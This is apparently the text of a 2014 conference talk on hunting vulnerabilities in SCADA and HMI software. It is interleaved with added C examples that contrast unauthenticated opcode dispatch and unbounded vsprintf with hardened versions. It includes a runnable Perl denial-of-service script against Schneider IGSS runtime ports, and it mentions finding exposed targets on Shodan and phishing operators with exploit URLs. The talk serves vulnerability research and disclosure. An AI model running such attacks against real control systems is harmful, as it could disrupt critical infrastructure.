SCADA Software or Swiss
Cheese Software?
Code Blue 2014, Tokyo
Celil ÜNÜVER, SignalSEC Ltd.
The talk is about discovering SCADA vulnerabilities.
Agenda
• About me
• How it started?
• Why are SCADA apps so BUGGY?
• Hunting SCADA vulnerabilities
• Analysis of the vulnerabilities

About me
• Co-founder and Researcher @ SignalSEC Ltd.
• Organizer of NOPcon Hacker Conference (Istanbul, Turkey)
• Interested in vulnerability research, reversing
• Hunted a lot of bugs affecting Adobe, IBM, Microsoft, Facebook, Novell, SCADA vendors etc.
• Has been a speaker at CONFidence, Swiss Cyber Storm, c0c0n etc.

How it started?
• SCADA systems have been in our daily life for many years!
• There was not much interest in SCADA security

Milestone
• Stuxnet and Duqu attacks in 2010-2011
• SCADA systems got the attention of hackers and researchers after these attacks.
• Critical systems, fame, profit etc.
• They are all JUICY targets
• Lots of SCADA systems are open to the INTERNET

No more Stuxnet
• Sure, all of us know about Stuxnet!

SCADA Overview

ICS Vulnerabilities
• Hardware/Firmware vulnerabilities: vulns in PLC & RTU devices
• Software vulnerabilities: vulns in control system software (HMI), which also affect the PLC/RTU devices

TWO DOZEN BUGS IN A FEW HOURS

Trust me, it's easy!
Actually, it's really easy to hunt SCADA BUGS!!!

Why is it easy?
There wasn't a real threat to SCADA software until 2010, so the developers were not aware of SECURE development.

Hunting Vulnerabilities
• Simple reversing rocks!
• 1) Analyze the target software (potential inputs: communication protocols, ActiveX etc.)
• 2) Discover & trace the input
• 3) Hunt the bugs.

Hunting Vulnerabilities
"You must understand that there is more than one path to the top of the mountain."
- Miyamoto Musashi -

Case-1: CoDeSys Gateway Vuln
• CoDeSys is a development environment for industrial control systems used by lots of manufacturers.
• Aaron Portnoy from Exodus discovered these vulnerabilities.
• Status: Patched

Case-1: CoDeSys - RECON
• Listening PORT

Case-1: CoDeSys - Debug
• Breakpoint on recv()
• Send junk bytes
• Breakpoint on access to recv's 'buf' parameter

Case-1: CoDeSys - Debug
• Comparing

Case-1: CoDeSys - Switch Cases / Opcodes
• After we pass the comparison

Case-1: CoDeSys - Switch Cases
• Let's find the bugs

Case-1: CoDeSys - Delete File
• Opcode: 13

Case-1: CoDeSys - Upload File
• Opcode: 6

Case-1: Recommendation
• Actually, the file remove / upload "bugs" are a 'feature' of this application :)
• But there is no authentication for these operations. Somebody can reverse the packet structure and use these features for evil!
• To solve this kind of bug, developers should add an "authentication" step before executing opcodes.
• Patched in 2013
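The dispatcher pattern behind Case-1, as an added example that is not CoDeSys code and not the speaker's: a file-service handler reconstructed only from what the slides describe (a compare on the received buffer, then a switch on the opcode, with opcode 13 deleting a file and opcode 6 uploading one, and no authentication in front of either), next to the hardened form the recommendation asks for, a login opcode that must succeed on the session before the file opcodes are dispatched. The packet layout, the MAGIC constant, OP_AUTH, the shared secret and the return codes are assumptions; only opcodes 6 and 13 come from the talk, and the upload handler body is left out. The same missing gate is what the talk later reports for MOVICON (operations callable without authentication) and, without even the magic compare, for InduSoft.

```c
/* Added example, not CoDeSys code: an opcode dispatcher of the shape Case-1
 * describes, beside a hardened variant. Packet layout, MAGIC, OP_AUTH, the
 * secret and return codes are assumptions; opcodes 6/13 are from the talk. */
#include <stdbool.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define MAGIC     0x4321u   /* assumed: constant the recv() buffer is compared against */
#define OP_AUTH   1         /* assumed: exists only in the hardened variant */
#define OP_UPLOAD 6         /* from the talk (handler body omitted here) */
#define OP_DELETE 13        /* from the talk */
#define MAX_NAME  255

/* Assumed layout: u16 magic (little-endian) | u8 opcode | u8 len | payload[len] */
struct session { bool authenticated; };
static const char SECRET[] = "operator-secret";   /* placeholder credential */

static int parse(const uint8_t *buf, size_t n, uint8_t *op, const uint8_t **payload, size_t *plen) {
    if (n < 4) return -1;
    if ((uint16_t)(buf[0] | (buf[1] << 8)) != MAGIC) return -1;  /* the "Comparing" step */
    *op = buf[2];
    *plen = buf[3];
    if (4 + *plen > n) return -1;   /* length field must not exceed what was received */
    *payload = buf + 4;
    return 0;
}

/* Opcode 13: payload is the file name; the daemon removes it, no questions asked. */
static int do_delete(const uint8_t *p, size_t n) {
    char name[MAX_NAME + 1];
    if (n == 0 || n > MAX_NAME) return -1;
    memcpy(name, p, n);
    name[n] = '\0';
    return unlink(name) == 0 ? 0 : -1;
}

/* VULNERABLE shape: magic compare, then straight into the opcode switch. Anyone
 * who has reversed the packet structure can call the file operations. */
int handle_packet_vuln(const uint8_t *buf, size_t n) {
    uint8_t op; const uint8_t *p; size_t plen;
    if (parse(buf, n, &op, &p, &plen) != 0) return -1;
    switch (op) {
    case OP_DELETE: return do_delete(p, plen);
    case OP_UPLOAD: return -1;   /* write-to-disk handler left out of the example */
    default:        return -1;
    }
}

/* Constant-time compare so the login opcode does not leak the secret byte by byte. */
static bool ct_equal(const uint8_t *a, size_t alen, const char *b, size_t blen) {
    unsigned diff = (alen != blen);
    for (size_t i = 0; i < alen && i < blen; i++) diff |= a[i] ^ (uint8_t)b[i];
    return diff == 0;
}

/* HARDENED: the talk's recommendation, an authentication step before the
 * switch. -2 means "not logged in" so callers can tell it from a bad packet. */
int handle_packet_hardened(struct session *s, const uint8_t *buf, size_t n) {
    uint8_t op; const uint8_t *p; size_t plen;
    if (parse(buf, n, &op, &p, &plen) != 0) return -1;
    if (op == OP_AUTH) {
        s->authenticated = ct_equal(p, plen, SECRET, strlen(SECRET));
        return s->authenticated ? 0 : -1;
    }
    if (!s->authenticated) return -2;
    return handle_packet_vuln(buf, n);   /* same dispatch, now behind the gate */
}

/* Client-side helper: serialise one packet into out (needs 4 + plen bytes). */
size_t build_packet(uint8_t *out, uint8_t op, const void *payload, uint8_t plen) {
    out[0] = MAGIC & 0xff; out[1] = MAGIC >> 8; out[2] = op; out[3] = plen;
    memcpy(out + 4, payload, plen);
    return 4 + (size_t)plen;
}

/* Demo: the same delete packet against both handlers, on a scratch file.
 * Returns 1 when the unauthenticated handler removed the file, 2 when the
 * hardened one refused it before OP_AUTH and honoured it after, -1 on setup error. */
int demo(bool hardened) {
    char name[] = "/tmp/gw-demo-XXXXXX";
    int fd = mkstemp(name); if (fd < 0) return -1; close(fd);
    uint8_t pkt[4 + MAX_NAME], auth[4 + MAX_NAME];
    size_t len = build_packet(pkt, OP_DELETE, name, (uint8_t)strlen(name));
    if (!hardened)
        return (handle_packet_vuln(pkt, len) == 0 && access(name, F_OK) != 0) ? 1 : 0;
    struct session s = { false };
    int before   = handle_packet_hardened(&s, pkt, len);
    int survived = access(name, F_OK) == 0;
    size_t alen  = build_packet(auth, OP_AUTH, SECRET, (uint8_t)strlen(SECRET));
    int login    = handle_packet_hardened(&s, auth, alen);
    int after    = handle_packet_hardened(&s, pkt, len);
    int gone     = access(name, F_OK) != 0;
    unlink(name);   /* no-op when the delete above worked */
    return (before == -2 && survived && login == 0 && after == 0 && gone) ? 2 : 0;
}
```

Renumbering the opcodes, which is what the MOVICON story says the vendor did, only changes OP_DELETE and OP_UPLOAD here; the unauthenticated path still reaches unlink(), so the fix has to be the session gate in front of the switch, not the constants.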
An Interesting Story: Progea MOVICON Vulnerability - still 0day
"When a patch doesn't patch anything!"
• 23 Nov 2013: I discovered some vulnerabilities in the latest version of the Progea MOVICON HMI software
• 24 Nov 2013: We published a short analysis on Pastebin
• 3 Dec 2013: ICS-CERT contacted us about the post on Pastebin. They asked for details, we sent the information etc.

An Interesting Story: Progea MOVICON Vulnerability - 0day
• 5 Dec 2013: from ICS-CERT to me;

An Interesting Story: Progea MOVICON Vulnerability - 0day
• THEY SAY: The bugs you discovered are SIMILAR to a bunch of OLDER BUGS, PATCHED IN 2011.
• ICSA-11-056;
• My findings look exactly the same!!!! But I am able to reproduce them on the latest version!!

An Interesting Story: Progea MOVICON Vulnerability - 0day
• These bugs are similar to the bugs that we analyzed in Case-1: CoDeSys
• There is NO authentication to call some functions and operations in the software. Somebody can reverse the packet structure and use these features for evil!
• After a conversation with the Code Blue staff, we have decided to mask some details of this zero-day vulnerability.

An Interesting Story: Progea MOVICON Vulnerability - 0day

An Interesting Story: Progea MOVICON Vulnerability - 0day
• Remote Information Disclosure: opcode [-censored-]

An Interesting Story: Progea MOVICON Vulnerability - 0day
• Opcode [-censored-] calls the GetVersionExA API and sends the output to the client

An Interesting Story: Progea MOVICON Vulnerability - 0day
• Here is a simple PoC for this bug;

An Interesting Story: Progea MOVICON Vulnerability - 0day
• When we run it and call opcode [-censored-]:
• The 6th byte in the printed data is "dwMajorVersion", a field of the OSVERSIONINFO structure that GetVersionExA fills in, and it gives information about the OS.
• Status: PATCHED(!) in 2011, but we are able to exploit it in 2014!

An Interesting Story: Progea MOVICON Vulnerability - 0day
• So what is the problem? Why are the old bugs still there!?
• After comparing the older version and the latest version, I understood that the vendor actually didn't patch anything.
• Instead of fixing the vulnerabilities, they just changed the "opcodes" of the functions in the new version!
• Older version: opcode 7 causes the info disclosure vulnerability by calling the GetVersionEx API
• New version: they just changed opcode "7" to "X" for calling the GetVersionEx API

PROGEA, your fail is unbelievable!

Temporary solution
• Block remote connections to TCP:10651
• If you contact me personally, I can share vulnerability signatures that you can use in your IDS/IPS (Snort etc.)

Case-3: CoDeSys WebVisu
• CoDeSys WebVisu uses a web server which is usually open to the Internet for visualization of the PLC
• Discovered by me
• Status: Patched

Case-3: CoDeSys Vulnerability
• Buffer overflow vulnerability when parsing long HTTP requests, due to an unsafe function.
• It uses "vsprintf" to print which file is requested.

Case-4: Schneider IGSS Vulnerability
• Gas distribution in Europe
• Airport in Asia
• Traffic control center in Europe

Case-4: Schneider IGSS Vulnerability
• Discovered by me
• Status: Patched
• IGSS listens on ports 12399 and 12397 at runtime
• A few lines of code cause a DoS (the slide shows only the setup; the connect/send part below is completed so the snippet runs, and which payload goes to which port is assumed from the variable names):

    use IO::Socket;
    $host   = "localhost";
    $port   = 12399;
    $port2  = 12397;
    $first  = "\x01\x01\x00\x00";   # 4-byte payload for the first port
    $second = "\x02\x01\x00\x00";   # 4-byte payload for the second port
    # completed: open each runtime port and send its payload
    $sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp")
        or die "connect $host:$port failed: $!";
    print $sock $first;
    close $sock;
    $sock2 = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port2, Proto => "tcp")
        or die "connect $host:$port2 failed: $!";
    print $sock2 $second;
    close $sock2;

Case-5: Schneider Electric Accutech Heap Overflow Vulnerability
• Buffer overflow vulnerability when parsing long HTTP requests, due to an unsafe function
• Status: Patched

Case-5: Schneider Electric Accutech Heap Overflow Vulnerability

Case-5: Schneider Electric Accutech Heap Overflow Vulnerability
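The unsafe call behind Case-3 and Case-5, as an added example that is neither CoDeSys nor Accutech code: the talk only says the web server formats the requested file name with vsprintf and that a long HTTP request overflows, so the buffer size, the log message and the request-line parser here are assumptions. The block keeps the vsprintf version for comparison, replaces it with vsnprintf whose return value exposes truncation, and computes the request length at which the unbounded version would start writing past the buffer.

```c
/* Added example, not CoDeSys or Accutech code: the logging pattern Case-3 and
 * Case-5 describe (an unbounded vsprintf of the requested file name into a
 * fixed buffer) beside a bounded replacement. Buffer size, log format and the
 * request-line parser are assumptions. */
#include <stdarg.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LOGBUF 256                          /* assumed size of the fixed log buffer */
#define LOGFMT "requested file: %.*s\n"     /* assumed message the server formats */

/* VULNERABLE: vsprintf does not know how big dst is. A request target longer
 * than the buffer minus the fixed text runs past dst. Shown for comparison only;
 * nothing below calls it, since that would be undefined behaviour. */
void log_request_vuln(char *dst, const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    vsprintf(dst, fmt, ap);
    va_end(ap);
}

/* HARDENED: vsnprintf bounds the write and always NUL-terminates; its return
 * value is the full message length, so the caller can see truncation. */
bool log_request_safe(char *dst, size_t cap, const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(dst, cap, fmt, ap);
    va_end(ap);
    return n >= 0 && (size_t)n < cap;   /* false: message was cut short */
}

/* Locate the request-target in "METHOD SP target SP HTTP/x.y". Returns its
 * length or -1 if the line is malformed; no copy, so no size limit of its own. */
int request_target(const char *line, const char **target) {
    const char *sp1 = strchr(line, ' ');
    if (!sp1) return -1;
    const char *sp2 = strchr(sp1 + 1, ' ');
    if (!sp2 || strncmp(sp2 + 1, "HTTP/", 5) != 0) return -1;
    *target = sp1 + 1;
    return (int)(sp2 - sp1 - 1);
}

/* Longest "/AAAA..." target (counting the A's) that the fixed message still
 * holds with its NUL: anything longer is where the vsprintf version overflows. */
size_t max_safe_target_chars(void) {
    return LOGBUF - 1 - (strlen("requested file: ") + 1 + 1);   /* "/" and "\n" */
}

/* Build "GET /<n x 'A'> HTTP/1.1", log the target with the bounded logger and
 * report 0 = fitted, 1 = truncated (request of attacker length), -1 = bad line. */
int simulate_request(size_t n) {
    char *line = malloc(n + 32);
    if (!line) return -1;
    memcpy(line, "GET /", 5);
    memset(line + 5, 'A', n);
    strcpy(line + 5 + n, " HTTP/1.1");
    const char *t;
    int tlen = request_target(line, &t), result = -1;
    if (tlen >= 0) {
        char logbuf[LOGBUF];
        bool fit = log_request_safe(logbuf, sizeof logbuf, LOGFMT, tlen, t);
        result = strlen(logbuf) < sizeof logbuf ? (fit ? 0 : 1) : -1;   /* in bounds either way */
    }
    free(line);
    return result;
}
```

The bug class is the same whether the destination is on the stack (the WebVisu slide says buffer overflow) or on the heap (the Accutech slide says heap overflow): the formatted length is attacker-controlled and the destination size is never consulted. Passing `sizeof logbuf` only works because logbuf is an array in scope; for a heap buffer the capacity has to travel with the pointer.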
Case-6: Pwning the Operator

Case-6: Invensys Wonderware System Platform Vulnerability
• Discovered by me
• Status: Patched
• Killing five birds with one stone :)

Case-6: Invensys Wonderware System Platform Vulnerability
• An ActiveX buffer overflow vulnerability
• Found just by ActiveX fuzzing...
• Send the exploit URL to the HMI operator
• Click and pwn!

Case-7: InduSoft HMI Bugs

Case-7: InduSoft HMI Bugs
• This is really creepy!
• This software doesn't even check a "magic" value in incoming packets. There is no custom packet structure!
• Sending 1 byte to TCP:4322 is enough to jump into a switch case

Case-7: InduSoft HMI Exploit

Finding Targets
• Banner information: "3S_WebServer"
• Let's search for it on SHODAN! :)

CoDeSys WebServer on SHODAN
• Server banner: "3S_WebServer"
• Shodan results: 151

Demo
• DEMO

Conclusion
• Critical infrastructures are juicy targets!
• Hacktivists are interested in SCADA hacking too, not only government intelligence agencies.
• Applications are insecure!

Thank you!
• Contact: cunuver@signalsec.com
• Twitter: @celilunuver
• www.signalsec.com
• www.securityarchitect.org